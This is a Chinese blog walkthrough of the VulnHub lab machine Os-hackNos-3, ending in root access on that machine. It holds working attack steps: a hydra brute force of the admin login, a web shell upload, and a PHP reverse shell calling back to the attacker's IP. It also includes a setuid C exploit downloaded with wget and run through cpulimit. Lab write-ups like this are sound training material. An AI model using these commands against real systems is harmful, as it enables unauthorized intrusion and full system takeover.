vulnhub靶机 Os-hackNos-3

下载靶机

地址:hackNos: Os-hackNos-3 ~ VulnHub

 

问题阐述

使用virtualbox,kali和靶机均使用桥接网络

kali:172.20.10.10 靶机:172.20.10.5

打靶目标

获取root权限

打靶过程

信息搜集

nmap扫描存活主机,并对存活主机做端口扫描

nmap -sP 172.20.10.1/24

nmap -sV -sC -p- 172.20.10.5 

 目录扫描

gobuster dir -u http://172.20.10.5 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

 访问网站,发现是一个博客,直接尝试访问后台

爬取网站信息制作字典

cewl http://172.20.10.5/websec/ >cewl.txt

 hydra 穷举后台

hydra -l contact@hacknos.com -P cewl.txt 172.20.10.5 http-post-form "/websec/admin:username=^USER^&password=^PASS^:Wrong email"

 登录后台,上传shell,清除.hatccess

使用蚁剑连接。在这里找到第一个flag

 网上有好多反弹shell的方法,nc反弹shell,我没成功,最后在目录上创建了一个a.php文件,写入以下内容,执行文件,反弹成功

<?php $sock=fsockopen("172.20.10.10",1234);exec("/bin/sh -i <&3 >&3 2>&3");?>

//php反弹shell

 转为交互式shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

权限提升

查找 suid 文件
find /usr/bin -type f -perm -u=s 2>/dev/null

 cpulimit 提权

本地编写提权exp,上传到靶机,执行即可提升到root权限

//新建 suid.c

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main(int argc,char *argv[])
{
    setreuid(0,0);
    execve("/bin/bash",NULL,NULL);
}

//编译改名为exp

gcc suid.c -o exp

//kali开启http服务

python3 -m http.server 8001

//靶机下载文件

wget http://172.20.10.10:8001/exp


//赋予执行权限靶机执行文件

chmod +x exp

cpulimit -l 100 -f ./exp

www-data@hacknos:/tmp$ cpulimit -l 100 -f ./exp
cpulimit -l 100 -f ./exp
Process 2800 detected
root@hacknos:/tmp# id 
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
root@hacknos:/tmp# whoami
whoami
root
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

凉城木槿

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值